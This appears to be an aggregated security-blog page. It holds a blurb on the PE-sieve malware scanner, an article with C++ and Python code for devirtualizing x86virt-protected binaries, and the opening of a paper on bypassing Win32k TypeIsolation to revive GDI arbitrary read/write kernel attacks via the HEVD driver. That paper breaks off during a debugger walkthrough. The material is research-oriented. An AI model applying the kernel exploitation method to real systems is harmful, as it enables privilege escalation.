PE-sieve is a light-weight tool that helps to detect malware running on the system

PE-sieve

PE-sieve is a light-weight tool that helps to detect malware running on the system, as well as to collect the potentially malicious material for further analysis. Recognizes and dumps variety of implants within the scanned process: replaced/injected PEs, shellcodes, hooks, and other in-memory patches.
Detects inline hooks, Process Hollowing, Process Doppelgänging, Reflective DLL Injection, etc.

uses library: https://github.com/hasherezade/libpeconv.git

Clone:

Use recursive clone to get the repo together with the submodule:

git clone --recursive https://github.com/hasherezade/pe-sieve.git

Latest builds*:

*those builds are available for testing and they may be ahead of the official release:

example: classic unmapping (2) vs remapping (3) — with remapping full virtual content of the section is preserved, so it helps i.e. if the full section was unpacked in memory, or if virtual caves were used


logo by Baran Pirinçal

Реклама

Project: x86-devirt

Unpackme — x86 Virtualizer

Today, I am going to be going through how x86devirt works to disassemble and devirtualize the behaviour of code obfuscated using the x86virt virtual machine. I needed several tools to complete this task, the development of which will be covered in this article.

A code virtualizer protects code behaviour by retargeting some subroutines or sections of code from the x86/x64 platform (which is well understood and documented) into a (usually somewhat random) platform that we do not understand. Additionally, the tools we use to discover and analyze behaviour in executable code (such as radare2 or x64dbg) also do not understand it well. This makes identifying malicious behaviour, developing generic signatures or extracting other behavioral details from the code impossible without reversing the process in some way.

While it costs a large overhead in performance, obfuscation using code virtualization is very effective. Depending on the complexity of the protector/virtualizer, these packers can be very painful and tedious to work through.

Resources

You can see the final product (devirtualizer) of this article at the following GitHub URL: https://github.com/JeremyWildsmith/x86devirt

We are reverse engineering an unpackme by ReWolf at the following URL: https://tuts4you.com/download/1850/

This sample has been packed with an open-source application by ReWolf that is publicly posted on GitHub at the following URL: https://github.com/rwfpl/rewolf-x86-virtualizer

If you would like to look at a very simple example of a virtual machine, I have a project up on my GitHub that demonstrates the basic function of a VM Stub and you can see how exactly it works. The project is located at the following URL: https://github.com/JeremyWildsmith/StackLang

Tools / Knowledge

In this article I am going to use the following tools & knowledge:

  • The disassembler, written in the C++ programming language
  • x86 Intel Assembly
  • YARA Signatures
  • The udis86 library, used to disassemble x86 instructions
  • Python, used to automate x64dbg and the x64dbgpy plugin, as well as run Angr simulations to extract the jmp mappings
  • The x86virt unpackme sample by ReWolf on tuts4you.com (https://tuts4you.com/download/1850/)

How the x86virt VM Works

Before I dive into how x86devirt works, I am going to give a brief overview on my findings of how the x86virt VM works.

x86virt starts by taking the application to be protected and grabbing some subroutines that it has decided to protect. The x86 code for these subroutines is translated into an instruction set that uses the following format:

(Instruction Size)(Instruction Prefix)(Instruction Data)

  • Instruction Size — The size in bytes of the instruction
  • Instruction Prefix — This is 0xFFFF if the instruction is a VM instruction. Otherwise, the remaining bytes in the instruction data (and instruction prefix) should be interpreted as a x86 instruction
  • Instruction Data — If (Instruction Prefix) is 0xFFFF, this is the VM Opcode bytes followed by the operand bytes. Otherwise, these bytes are appended to the (Instruction Prefix) to form a valid x86 instruction.

For every VM Layer or virtualized target, x86virt randomizes the opcodes for that VM. So when we devirtualize, we need to map the opcodes to their respective VM instruction.

x86virt also takes instructions like the ones below:

mov eax, [esp + 0x8]

And translates them into something like this:

mov VMR, 0x8
add VMR, esp
mov eax, [VMR]

VMR is a register that only exists in the virtual machine, so during devirtualization, we need to interpret this and translate it back into its original form.

Finally, x86virt encrypts the entire instruction using an encryption algorithm that is, to some extent, randomized. Every time an instruction is executed, it is first decrypted and then interpreted. However, there is one consistency with instruction encryption between targets and VM layers: regardless of how the instruction was encrypted, in its encrypted form, the first byte XORed with the second byte will always give you the instruction length.

Another important note regarding instruction encryption is that the key to decrypt it is the address of that VM instruction relative to the start of the virtual function/code stub it belongs to. In other words, the key is the offset to that instruction in the function that has been virtualized. This means you cannot just blindly decrypt all the instructions in a function. You must do proper control flow analysis to determine where in memory the valid bytecode instructions are by identifying and following conditional or unconditional jumps.

So to disassemble an x86virt VM instruction, we must know:

  1. The size of the instruction
  2. The offset to that instruction
  3. The encryption algorithm (because it is somewhat random)

There is one last piece of the puzzle that we must consider when disassembling x86virt VM code. The conditional jumps for x86virt VM are encoded with a jump type operand. The part of the code that interprets the jump type operand is also somewhat random between VM layers and virtualized targets. We need to handle this case in our devirtualizer as well.

The x86devirt Disassembler

An important part to the x86-devirtualizer is the disassembler. The role of this module is to take a stub of virtualized, encrypted x86virt bytecode that has been extracted from the protected application and produce a NASM x86 Assembly translation of the encrypted bytecode. To do this, it needs a few pieces of information from the protected application:

  1. A dump of the decryption algorithm that the VM stub uses to decrypt VM instruction before interpreting them
  2. The mappings of opcodes to their respective behaviour, since the opcodes are randomized (i.e, 0x33 maps to add, 0x22 maps to mov)
  3. The mappings of jmp type operand to their respective jump behavior (i.e, jmp type 2 maps to je, 3 maps to jne, etc…)
  4. A dump of the function / stub of code to be devirtualized

We will see how this information is extracted by looking at the x86devirt.py x64dbg plugin later, but for now we will assume we have been provided this information.

The first step is to get the instruction length, decrypt the instruction and then identify whether we should interpret the instruction as an x86 instruction or a VM bytecode instruction. We see this being done in disassemblers’ decodeVmInstruction method:

unsigned int decodeVmInstruction(vector<DecodedVmInstruction>& decodedBuffer, uint32_t vmRelativeIp, VmInfo& vmInfo) {

    uint32_t instrLength = getInstructionLength(vmInfo.getBaseAddress() + vmRelativeIp, vmInfo);

    //Read with offset 1, to trim off instr length byte
    unique_ptr<uint8_t[]> instrBuffer = vmInfo.readMemory(vmInfo.getBaseAddress() + vmRelativeIp + 1, instrLength);
    vmInfo.decryptMemory(instrBuffer.get(), instrLength, vmRelativeIp);

    DecodedInstructionType_t instrType = DecodedInstructionType_t::INSTR_UNKNOWN;

    if(*reinterpret_cast<unsigned short*>(instrBuffer.get()) == 0xFFFF) {
        //Offset by 2 which removes the 0xFFFF part of the instruction.

        //Map instructions correctly
        instrBuffer[2] = vmInfo.getOpcodeMapping(instrBuffer[2]);
        decodedBuffer = disassembleVmInstruction(instrBuffer.get() + 2, instrLength - 2, vmRelativeIp, vmInfo);
    } else {
        decodedBuffer = disassemble86Instruction(instrBuffer.get(), instrLength, vmInfo.getBaseAddress() + vmRelativeIp);
    }

    return instrLength + 1;
}

We see that the size is extracted using the getInstructionLength method (this will simply XOR the first two bytes to get the length). After that, the instruction is decrypted by using the dumped decryption subroutine extracted from the protected application (a more proper approach would be to emulate the code rather than directly executing it). Finally, we examine the first word to identify how to decode the instruction (as an x86 instruction or as a VM instruction). If the instruction is a VM bytecode instruction, we need to look up the opcode in the opcode mapping to determine what behaviour it maps to.

The way we disassemble x86 instructions is by using the udis86 library, and also keeping some basic information about the disassembled instruction. You can see how that is done below:

vector<DecodedVmInstruction> disassemble86Instruction(const uint8_t* instrBuffer, uint32_t instrLength, const uint32_t instrAddress) {
    DecodedVmInstruction result;
    result.isDecoded = false;
    result.address = instrAddress;
    result.controlDestination = 0;
    result.size = instrLength;

    memcpy(result.bytes, instrBuffer, instrLength);

    ud_set_input_buffer(&ud_obj, instrBuffer, instrLength);
    ud_set_pc(&ud_obj, instrAddress);
    unsigned int ret = ud_disassemble(&ud_obj);
    strcpy(result.disassembled, ud_insn_asm(&ud_obj));

    if(ret == 0)
        result.type = DecodedInstructionType_t::INSTR_UNKNOWN;
    else
        result.type = (!strncmp(result.disassembled, "ret", 3) ? DecodedInstructionType_t::INSTR_RETN : DecodedInstructionType_t::INSTR_MISC);

    vector<DecodedVmInstruction> resultSet;
    resultSet.push_back(result);

    return resultSet;
}

When it comes to disassembling x86virt bytecode instructions, we do that with a different subroutine, disassembleVmInstruction. The purpose of this subroutine is fairly straightforward so I won’t bore you by reading the code line by line. However, some interesting cases are case 1 and case 2, which are essentially x86 instructions with VMR as the operand. It is also worth noting case 7 where the decoding of x86virt jump instructions are handled and case 16 which just signals for the VM to stop interpreting (and has no x86 equivalent)

Once we can disassemble the instructions, we need to properly identify where they are. As was previously mentioned, this requires some control flow analysis. During control flow analysis, the disassembler identifies the different blocks of code in a subroutine by using the getDisassembleRegions function. The getDisassembleRegions basically returns the regions of code in a method that can be reached using conditional or unconditional jumps inside of a virtualized function. We can see its behaviour below:

vector<DisassembledRegion> getDisassembleRegions(const uint32_t initialIp, VmInfo& vmInfo) {
    vector<DisassembledRegion> disassembledStubs;
    queue<uint32_t> stubsToDisassemble;
    stubsToDisassemble.push(initialIp);

    while(!stubsToDisassemble.empty()) {
        uint32_t vmRelativeIp = stubsToDisassemble.front() - vmInfo.getBaseAddress();
        stubsToDisassemble.pop();

        if(isInRegions(disassembledStubs, vmRelativeIp))
            continue;

        DisassembledRegion current;
        current.min = vmRelativeIp;

        bool continueDisassembling = true;
        while(vmRelativeIp <= vmInfo.getDumpSize() && continueDisassembling) {

            vector<DecodedVmInstruction> instrSet;

            vmRelativeIp += decodeVmInstruction(instrSet, vmRelativeIp, vmInfo);

            for(auto& instr : instrSet) {
                if(instr.type == DecodedInstructionType_t::INSTR_UNKNOWN) {
                    stringstream msg;
                    msg << "Unknown instruction encountered: 0x" << hex << ((unsigned long)instr.bytes[0]);
                    throw runtime_error(msg.str());
                }

                if(instr.type == DecodedInstructionType_t::INSTR_JUMP || instr.type == DecodedInstructionType_t::INSTR_CONDITIONAL_JUMP)
                    stubsToDisassemble.push(instr.controlDestination);

                if(instr.type == DecodedInstructionType_t::INSTR_STOP || instr.type == DecodedInstructionType_t::INSTR_RETN || instr.type == DecodedInstructionType_t::INSTR_JUMP)
                    continueDisassembling = false;
            }
        }

        current.max = vmRelativeIp;
        disassembledStubs.push_back(current);
    }

    //Now we must resolve all overlapping stubs
    for(auto it = disassembledStubs.begin(); it != disassembledStubs.end();) {
        if(isInRegions(disassembledStubs, it->min, it->max))
            disassembledStubs.erase(it++);
        else
            it++;
    }

    return disassembledStubs;
}

The getDisassembleRegions performs the following functionality:

  1. Disassemble the virtualized subroutine from its start address and continues to do so until it encounters a jump (conditional or unconditional) or a return.
  2. If a conditional jump is encountered, its destination address is queued up to be the next region to be disassembled and the disassembler continues executing.
  3. If an unconditional jump is encountered, the destination address is queued up and disassembling of the current block ends
  4. If a ret is encountered, disassembling of the current block ends.
  5. Loops until there are no more regions to be disassembled.

The problem with the above algorithm is that it will identify code such as what is seen below:

labelD:
...
...
labelA:
...
...
jmp labelB
...
...
labelB:
...
...
jz labelD
...

As having overlapping blocks of code, which will result in redundant blocks of code and thus redundant disassembled output. This was solved by testing for and removing smaller overlapping regions:

    //Now we must resolve all overlapping stubs
    for(auto it = disassembledStubs.begin(); it != disassembledStubs.end();) {
        if(isInRegions(disassembledStubs, it->min, it->max))
            disassembledStubs.erase(it++);
        else
            it++;
    }

    return disassembledStubs;

After we know the basic blocks of a subroutine that contain valid executable code, we can begin disassembling them. This is done in the disassembleStub routine:

bool disassembleStub(const uint32_t initialIp, VmInfo& vmInfo) {

    vector<DisassembledRegion> stubs = getDisassembleRegions(initialIp, vmInfo);

    //Needs to be sorted, otherwise (due to jump sizes) may not fit into original location
    //Sorting should match it with the way it was implemented.
    sort(stubs.begin(), stubs.end(), sortRegionsAscending);

    if(stubs.empty()) {
        printf(";No stubs detected to disassemble.. %d", stubs.size());
        return true;
    }

    vector<DecodedVmInstruction> instructions;
    for(auto& stub : stubs) {

        bool continueDisassembling = true;
        DecodedVmInstruction blockMarker;
        blockMarker.type = DecodedInstructionType_t::INSTR_COMMENT;
        strcpy(blockMarker.disassembled, "BLOCK");
        instructions.push_back(blockMarker);
        for(uint32_t vmRelativeIp = stub.min; continueDisassembling && vmRelativeIp < stub.max;) {

            vector<DecodedVmInstruction> instrSet;

            vmRelativeIp += decodeVmInstruction(instrSet, vmRelativeIp, vmInfo);

            for(auto& instr : instrSet) {
                if(instr.type == DecodedInstructionType_t::INSTR_UNKNOWN)
                    throw runtime_error("Unknown instruction encountered");

                if(instr.type == DecodedInstructionType_t::INSTR_STOP) {
                    continueDisassembling = false;
                    break;
                }

                instructions.push_back(instr);
            }

        }

        instructions.push_back(blockMarker);
    }

    for(auto& i : eliminateVmr(instructions)) {
        formatInstructionInfo(i);
    }

    return true;
}

An important note with this method is that it sorts the disassembled regions by their start address after doing the control flow analysis with getDisassembledRegions. This sorting must be done because the natural order was thrown out of whack by the queuing nature of the control flow analysis. Functionally, the order doesn’t really make a difference in a normal application because at the end of the day, the code is still going to execute the same way regardless of where the instructions are. However, the way in which the blocks are organized will change the size of the code once it is assembled in NASM due to the way jump instructions are encoded on the x86 platform. Essentially, the distance between the jump instructions and their destination addresses will change depending on the order of the code blocks in the function, and the distance will influence the size of the jump instruction. If the devirtualized code is not the size of its original form (i.e, before it is was passed into x86virt to be virtualized) or smaller, then it will not fit back into where it was ripped from. While functionally, it doesn’t matter that it isn’t in the «proper» location, it does matter later when we encounter multiple VM layers because our signatures will not match partial handlers etc.

Other than that, there isn’t anything too weird or noteworthy here until we encounter the call to eliminateVmr. Remember that I mentioned how x86virt creates a virtual register. We need to eliminate that because we cannot assemble that through NASM or produce valid x86 code while we have a virtual register. Below, we can see the behaviour of eliminateVmr:

vector<DecodedVmInstruction> eliminateVmr(vector<DecodedVmInstruction>& instructions) {
    auto itVmrStart = instructions.end();
    vector<DecodedVmInstruction> compactInstructionlist;

    for(auto it = instructions.begin(); it != instructions.end(); it++) {
        if(!strncmp("mov VMR,", it->disassembled, 8) && itVmrStart == instructions.end()) {
            itVmrStart = it;
        }else if(itVmrStart != instructions.end() && strstr(it->disassembled, "[VMR]") != 0)
        {
            for(auto listing = itVmrStart; listing != it+1; listing++) {
                DecodedVmInstruction comment = *listing;
                comment.type = INSTR_COMMENT;
                compactInstructionlist.push_back(comment);
            }
            compactInstructionlist.push_back(eliminateVmrFromSubset(itVmrStart, it + 1));
            itVmrStart = instructions.end();
        } else if (itVmrStart == instructions.end()) {
            compactInstructionlist.push_back(*it);
        }
    }

    return compactInstructionlist;
}

The way VMR is used in the virtualized code is fairly convenient. VMR is essentially used to calculate pointer addresses. For example, it only ever appears in a similar form to:

mov VMR, 0
add VMR, ecx
shl VMR, 2
add VMR, 15
mov eax, [VMR]

It always starts with operations on VMR and ends with VMR being dereferenced. This means that we can essentially replace all of those instructions with:

mov eax, [ecx * 2 + 15]

So eliminateVmr will look for a pattern where the destination operand is VMR and then some operations on VMR followed by a dereference on VMR. Everything between that pattern can always be simplified using the same algorithm. You can see the specifics of that algorithm in eliminateVmrFromSubset:

DecodedVmInstruction eliminateVmrFromSubset(vector<DecodedVmInstruction>::iterator start, vector<DecodedVmInstruction>::iterator end) {
    bool baseReg2Used = false;
    bool baseReg1Used = false;
    char baseReg1Buffer[10];
    char baseReg2Buffer[10];
    uint32_t multiplierReg1 = 1;
    uint32_t multiplierReg2 = 1;

    uint32_t offset = 0;

    for(auto it = start; it != end; it++) {
        char* dereferencePointer = 0;

        if(!strncmp(it->disassembled, "mov VMR, 0x", 11)) {
            offset = strtoul(&it->disassembled[11], NULL, 16);
            baseReg1Used = false;
            baseReg2Used = false;
            multiplierReg1 = multiplierReg2 = 1;
        } else if(!strncmp(it->disassembled, "mov VMR, ", 9)) {
            baseReg1Used = true;
            baseReg2Used = false;
            multiplierReg1 = multiplierReg2 = 1;
            offset = 0;
            strcpy(baseReg1Buffer, &it->disassembled[9]);
        } else if(!strncmp(it->disassembled, "add VMR, 0x", 11)) {
            offset += strtoul(&it->disassembled[11], NULL, 16);
        } else if(!strncmp(it->disassembled, "add VMR, ", 9)) {
            if(baseReg1Used) {
                baseReg2Used = true;
                strcpy(baseReg2Buffer, &it->disassembled[9]);
            } else {
                baseReg1Used = true;
                strcpy(baseReg1Buffer, &it->disassembled[9]);    
            }
        } else if(!strncmp(it->disassembled, "shl VMR, 0x", 11)) {
            uint32_t shift = strtoul(&it->disassembled[11], NULL, 16);
            offset = offset << shift;
            if(baseReg1Used) {
                multiplierReg1 = multiplierReg1 << shift;
            }
            if(baseReg2Used) {
                multiplierReg2 = multiplierReg2 << shift;
            }
        }
    }

    auto lastInstruction = end - 1;
    string reconstructInstr(lastInstruction->disassembled);
    stringstream reconstructed;

    reconstructed << "[";

    if(baseReg1Used) {
        if(multiplierReg1 != 1)
            reconstructed << "0x" << hex << multiplierReg1 << " * ";

        reconstructed << baseReg1Buffer;
    }

    if(baseReg2Used) {
        reconstructed << " + ";
        if(multiplierReg2 != 1)
            reconstructed << "0x" << hex << multiplierReg2 << " * ";

        reconstructed << baseReg2Buffer;
    }

    if(offset != 0 || !(baseReg1Used))
        reconstructed <<  " + 0x" << hex << offset;

    reconstructed << "]";

    reconstructInstr.replace(reconstructInstr.find("[VMR]"), 5, reconstructed.str());

    DecodedVmInstruction result;

    result.isDecoded = true;
    result.address = start->address;
    result.size = 0;
    result.type = lastInstruction->type;
    strcpy(result.disassembled, reconstructInstr.c_str());

    return result;
}

Once VMR is eliminated, all that is left to do is print out the disassembly, which we can see being done here in disassembleStub:

...
    for(auto& i : eliminateVmr(instructions)) {
        formatInstructionInfo(i);
    }
...

Generating a Jump Map with Angr

As I mentioned earlier, when it comes to the x86virt bytecode conditional / unconditional jump instruction handler, we need to extract the jump mappings (that is, which value in the jump type operand matches which type of jump). The way the x86virt jump handler works is that it takes the first operand (which is the jump type) and passes it into a somewhat randomly generated subroutine. This subroutine returns true if the EFLAGS are in a condition that permits jumping, or false otherwise.

Because this subroutine is not static and is a bit different for every VM Layer or virtualized target, we need some way of extracting these mappings out of that randomly generated subroutine. If you are not familiar with Angr or symbolic execution, I suggest you read a tiny bit on it before reading this section because the learning curve can be a bit steep.

The jump maps are extracted by running an Angr simulation on the jump decoder that was extracted from the protected application. The simulation is done in x86devirt_jmp.py and the dump of the decoder is provided by x86devirt.py (which we will get into later).

The way this was performed was first by creating a table of x86 jump types with EFLAG values that permit a jump to be taken for that jump type and EFLAG values that do not permit a jump to be taken. Additionally, all jump types in the table were prioritized.

Jump type priority worked by giving x86 jump types that test less flags a lower priority than jump types that test more flags. The reason jump types need to be prioritized is because there is overlap in the conditions that need to be checked for different jumps. An example of this is the JZ jump (ZF = 0) and the JA (ZF = 0 and CF = 0) jump. Essentially, if a set of x candidate x86 jump types can be mapped to a particular jump type y, then y should be mapped to the highest priority jump type in the set of x.

Below we see the list of possible jumps:

possibleJmps = [
    {
        "name": "jz",
        "must": [0x40],
        "not": [0x1, 0],
        "priority": 1
    },
    {
        "name": "jo",
        "must": [0x800],
        "not": [0],
        "priority": 1
    },
    ...
    ...

Below is the code responsible for mapping which emulated states permit jumping and which states do not, for all jump types (0-15):

def getJmpStatesMap(proj):
    statesMap = {}

    state = proj.factory.blank_state(addr=0x0)
    state.add_constraints(state.regs.edx >= 0)
    state.add_constraints(state.regs.edx <= 15)
    simgr = proj.factory.simulation_manager(state)
    r = simgr.explore(find=0xDA, avoid=0xDE, num_find=100)

    for state in r.found:
        val = state.solver.eval(state.regs.edx)
        val = val - 0xD
        val = val / 2

        if(not statesMap.has_key(val)):
            statesMap[val] = {"must": [], "not": []}

        statesMap[val]["must"].append(state)

    state = proj.factory.blank_state(addr=0x0)
    state.add_constraints(state.regs.edx >= 0)
    state.add_constraints(state.regs.edx <= 15)
    simgr = proj.factory.simulation_manager(state)
    r = simgr.explore(find=0xDE, avoid=0xDA, num_find=100)

    for state in r.found:
        val = state.solver.eval(state.regs.edx)
        val = val - 0xD
        val = val / 2

        statesMap[val]["not"].append(state)

    return statesMap

The method essentially performs the following:

  1. Iterate through all states that reach a positive/negative return (jump allowed or not allowed to be taken)
  2. Resolve the constraint on the jump type (Jump type is stored in EDX)
  3. Append that state to either the «must» set, which is states that reached a positive return permitting the jump to be taken (offset 0xDA in the dumped jump decoder code) or «not» (offset 0xDE in the dumped jump decoder code)

After we know which states permit jumping or restrict jumping for each jump type, we can begin testing the constraints on the EFLAGS register that allow for arriving at those states to determine which kind of x86 jump it maps to:

def decodeJumps(inputFile):
    proj = angr.Project(inputFile, main_opts={'backend': 'blob', 'custom_arch': 'i386'}, auto_load_libs=False)

    stateMap = getJmpStatesMap(proj)
    jumpMappings = {}
    for key, val in stateMap.iteritems():

        for jmp in possibleJmps:
            satisfiedMustsRemaining = len(jmp["must"])
            satisfiedNotsRemaining = len(jmp["not"])

            for state in val["must"]:
                for con in jmp["must"]:
                    if (state.solver.satisfiable(
                            extra_constraints=[state.regs.eax & controlFlowBits == con & controlFlowBits])):
                        satisfiedMustsRemaining -= 1;

            for state in val["not"]:
                for con in jmp["not"]:
                    if (state.solver.satisfiable(
                            extra_constraints=[state.regs.eax & controlFlowBits == con & controlFlowBits])):
                        satisfiedNotsRemaining -= 1;

            if(satisfiedMustsRemaining <= 0 and satisfiedNotsRemaining <= 0):
                if(not jumpMappings.has_key(key)):
                    jumpMappings[key] = []

                jumpMappings[key].append(jmp)

    finalMap = {}
    for key, val in jumpMappings.iteritems():
        maxPriority = 0;
        jmpName = "NOE FOUND"
        for j in val:
            if(j["priority"] > maxPriority):
                maxPriority = j["priority"]
                jmpName = j["name"]
        finalMap[jmpName] = key
        print("Mapped " + str(key) + " to " + jmpName)

    proj.terminate_execution()
    return finalMap

For each possible x86virt jump type, we test against each candidate x86 jump type to see if the x86 jump’s «not» and «must» sets can be satisfied accordingly by the restrictions on the EFLAGS registers in each state. If all «not»s and «must»s are satisfied, then the x86 jump is added as a possible candidate for that jump type.

Later, we iterate through all candidate x86 jumps for each jump type and choose the one with the highest priority to be mapped to it.

Finding the Signatures in the Protected Binary & Dumping Required Data

Finally, on to the last module needed to devirtualize code. x86devirt.py is the x64dbgpy Python plugin that instructs x64dbg on how to devirtualize the target.

x86devirt uses YARA rules to locate sections of code in the protected application, including the VM Stub, the instruction handlers, etc… You can see these YARA rules in VmStub.yara, VmRef.yara and instructions.yara:

  1. VmStub.yara is the YARA signature of the Virtual Machine interpreter.
  2. VmRef.yara is the YARA signature to detect where the application passes control off to the interpreter to begin interpreting a section of x86virt bytecode.
  3. instructions.yara is a set of YARA signatures for the different x86 instruction handlers.

An important note with these signatures is that they must match the original VM Stub and the devirtualized code generated by x86devirt. For example, consider a target that has been virtualized using two VM layers. After the first layer has been devirtualized, there will be a new VM stub in plain x86 form (that is, the second layer of virtualization). These signatures need to detect that second layer. However, the second layer was assembled using a different environment than the first layer and thus we need to take care for some special x86 instruction encodings in our signature (some x86 instructions have more than one way of being encoded). For example, consider:

add eax, ebx ; Encoded as 03C3
add eax, ebx ; Encoded as 01D8

So, when developing our signatures, we need to keep in mind that NASM could choose either encoding. With YARA, I just masked out instructions like these. If you are ever developing a signature with these constraints, please look into this more. There are plenty of resources on this topic: https://www.strchr.com/machine_code_redundancy

When it comes to devirtualizing x86virt, we must perform the following:

  1. Locate all VM Stubs that are present in plain x86 form using the vmStub.yara YARA signature
  2. Extract the decryption routine from the VM Stub
  3. Locate all references to that VM Stub (i.e, all areas where the VM is invoked to begin virtualizing code)
  4. Through each reference, extract the address where the virtualized bytecode is, and where the original code was ripped from
  5. Emulate part of the VM Stub to locate all instruction handlers and their opcodes
  6. Apply the YARA signatures to identify which handler (and subsequently, opcode) maps to which instruction behaviour and produce the instruction / opcode mappings
  7. Locate the JXX instruction handler and dump the part of the handler responsible for testing whether, given the jump type and state of the EFLAGS, the jump is taken. This is passed to x86devirt_jmp.py to extract the jump mappings
  8. For each reference, dump the virtualized code around that references and, with the jmp mappings, instruction mappings and the decryption routine, feed it to the x86virt-disassembler to be disassembled
  9. Finally, run NASM on the disassembler output to produce a x86 binary blob that can be written into where the virtualized code was ripped from, therefore restoring the virtualized function to its original form
  10. Loop back and search for any newly unveiled VM stubs

This process, once completed, will leave the x64dbg debugger in a state that allows the application to be cleanly dumped without any need for the VM stub.

(https://github.com/JeremyWildsmith)

Save and Reborn GDI data-only attack from Win32k TypeIsolation

1 Background

In recent years, the exploit of GDI objects to complete arbitrary memory address R/W in kernel exploitation has become more and more useful. In many types of vulnerabilityes such as pool overflow, arbitrary writes, and out-of-bound write, use after free and double free, you can use GDI objects to read and write arbitrary memory. We call this GDI data-only attack.

Microsoft introduced the win32k type isolation after the Windows 10 build 1709 release to mitigate GDI data-only attack in kernel exploitation. I discovered a mistake in Win32k TypeIsolation when I reverse win32kbase.sys. It have resulted GDI data-only attack worked again in certain common vulnerabilities. In this paper, I will share this new attack scenario.

Debug environment:

OS:

Windows 10 rs3 16299.371

FILE:

Win32kbase.sys 10.0.16299.371

2 GDI data-only attack

GDI data-only attack is one of the common methods which used in kernel exploitation. Modify GDI object member-variables by common vulnerabilities, you can use the GDI API in win32k to complete arbitrary memory read and write. At present, two GDI objects commonly used in GDI data-only attacks are Bitmap and Palette. An important structure of Bitmap is:


Typedef struct _SURFOBJ {

DHSURF dhsurf;

HSURF hsurf;

DHPDEV dhpdev;

HDEV hdev;

SIZEL sizlBitmap;

ULONG cjBits;

PVOID pvBits;

PVOID pvScan0;

LONG lDelta;

ULONG iUniq;

ULONG iBitmapFormat;

USHORT iType;

USHORT fjBitmap;

} SURFOBJ, *PSURFOBJ;

An important structure of Palette is:


Typedef struct _PALETTE64

{

BASEOBJECT64 BaseObject;

FLONG flPal;

ULONG32 cEntries;

ULONG32 ulTime;

HDC hdcHead;

ULONG64 hSelected;

ULONG64 cRefhpal;

ULONG64 cRefRegular;

ULONG64 ptransFore;

ULONG64 ptransCurrent;

ULONG64 ptransOld;

ULONG32 unk_038;

ULONG64 pfnGetNearest;

ULONG64 pfnGetMatch;

ULONG64 ulRGBTime;

ULONG64 pRGBXlate;

PALETTEENTRY *pFirstColor;

Struct _PALETTE *ppalThis;

PALETTEENTRY apalColors[3];

}

In the kernel structure of Bitmap and Palette, two important member-variables related to GDI data-only attack are Bitmap->pvScan0 and Palette->pFirstColor. Two member-variables point to Bitmap and Palette’s data field, and you can read or write data from data field through the GDI APIs. As long as we modify two member-variables to any memory address by triggering a vulnerability, we can use GetBitmapBits/SetBitmapBits or GetPaletteEntries/SetPaletteEntries to read and write arbitrary memory address.

About using the Bitmap and Palette to complete the GDI data-only attack Now that there are many related technical papers on the Internet, and it is not the focus of this paper, there will be no more deeply sharing. The relevant information can refer to the fifth part.

3 Win32k TypeIsolation

The exploit of GDI data-only attack greatly reduces the difficulty of kernel exploitation and can be used in most common types of vulnerabilities. Microsoft has added a new mitigation after Windows 10 rs3 build 1709 —- Win32k Typeisolation, which manages the GDI objects through a doubly-linked list, and separates the head of the GDI object from the data field. This is not only mitigate the exploit of pool fengshui which create a predictable pool and uses a GDI object to occupy the pool hole and modify member-variables by vulnerabilities. but also mitigate attack scenario which modifies other member-variables of GDI object header to increase the controllable range of the data field, because the head and data field is no longer adjacent.

About win32k typeisolation mechanism can refer to the following figure:

Here I will explain the important parts of the mechanism of win32k typeisolation. The detailed operation mechanism of win32k typeisolation, including the allocation, and release of GDI object, can be referred to in the fifth part.

In win32k typeisolation, GDI object is managed uniformly through the CSectionEntry doubly linked list. The view field points to a 0x28000 memory space, and the head of the GDI object is managed here. The view field is managed by view array, and the array size is 0x1000. When assigning to a GDI object, RTL_BITMAP is used as an important basis for assigning a GDI object to a specified view field.

In CSectionEntry, bitmap_allocator points to CSectionBitmapAllocator, and xored_view, xor_key, xored_rtl_bitmap are stored in CSectionBitmapAllocator, where xored_view ^ xor_key points to the view field and xored_rtl_btimap ^ xor_key points to RTL_BITMAP.

In RTL_BITMAP, bitmap_buffer_ptr points to BitmapBuffer,and BitmapBuffer is used to record the status of the view field, which is 0 for idle and 1 for in use. When applying for a GDI object, it starts traversing the CSectionEntry list through win32kbase!gpTypeIsolation and checks whether the current view field contains a free memory by CSectionBitmapAllocator. If there is a free memory, a new GDI object header will be placed in the view field.

I did some research in the reverse engineering of the implementation of GDI object allocation and release about the CTypeIsolation class and the CSectionEntry class, and then I found a mistake. TypeIsolation traverses the CSectionEntry doubly linked list, uses the CSectionBitmapAllocator to determine the state of the view field, and manages the GDI object SURFACE which stored in the view field, but does not check the validity of CSectionEntry->view and CSectionEntry->bitmap_allocator pointers, that is to say if we can construct a fake view and fake bitmap_allocator, and we can use the vulnerability to modify CSectionEntry->view and CSectionEntry->bitmap_allocator to point to fake struct, we can re-use GDI object to complete the data-only attack.

4 Save and reborn gdi data-only attack!

In this section, I would like to share the idea of ​​this attack scenario. HEVD is a practice driver developed by Hacksysteam that has typical kernel vulnerabilities. There is an Arbitrary Write vulnerability in HEVD. We use this vulnerability as example to share my attack scenario.

Attack scenario:

First look at the allocation of CSectionEntry, CSectionEntry will allocate 0x40 size session paged pool, CSectionEntry allocate pool memory implementation in NSInstrumentation::CSectionEntry::Create().


.text:00000001C002AC8A mov edx, 20h ; NumberOfBytes

.text:00000001C002AC8F mov r8d, 6F736955h ; Tag

.text:00000001C002AC95 lea ecx, [rdx+1] ; PoolType

.text:00000001C002AC98 call cs:__imp_ExAllocatePoolWithTag //Allocate 0x40 session paged pool

In other words, we can still use the pool fengshui to create a predictable session paged pool hole and it will be occupied with CSectionEntry. Therefore, in the exploit scenario of HEVD Arbitrary write, we use the tagWND to create a stable pool hole. , and use the HMValidateHandle to leak tagWND kernel object address. Because the current vulnerability instance is an arbitrary write vulnerability, if we can reveal the address of the kernel object, it will facilitate our understanding of this attack scenario, of course, in many attack scenarios, we only need to use pool fengshui to create a predictable pool.


Kd> g//make a stable pool hole by using tagWND

Break instruction exception - code 80000003 (first chance)

0033:00007ff6`89a61829 cc int 3

Kd> p

0033:00007ff6`89a6182a 488b842410010000 mov rax,qword ptr [rsp+110h]

Kd> p

0033:00007ff6`89a61832 4839842400010000 cmp qword ptr [rsp+100h],rax

Kd> r rax

Rax=ffff862e827ca220

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free ) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Allocated) *Ustx Process: ffffd40acb28c580

